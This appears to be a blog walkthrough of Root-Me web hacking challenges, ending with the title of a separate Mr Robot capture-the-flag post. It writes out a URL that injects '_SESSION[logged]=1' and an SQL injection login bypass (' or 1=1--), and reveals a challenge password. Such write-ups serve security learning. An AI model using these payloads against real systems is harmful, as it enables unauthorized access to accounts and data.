It says ‘if password blah….OR _SESSION[logged]=1′ “well done, you can validate with the password:’

So let’s add ‘?_SESSION[logged]=1’ to the url.

http://challenge01.root-me.org/web-serveur/ch17/?_SESSION%5Blogged%5D=1

well done, you can validate with the password : NoTQYipcRKkgrqG

SQL Injection

Find administrator password.

On the first try I got it. User name admin, password ‘ or 1=1–

The next page says ‘Welcome user1’ then has the password of the user obscured. Highlight the entry and right click your mouse then select ‘inspect element’.

My Walkthrough to Solving Mr Robot’s Capture the Flag Challenge

December 3, 2017January 10, 2018 | shadow0x33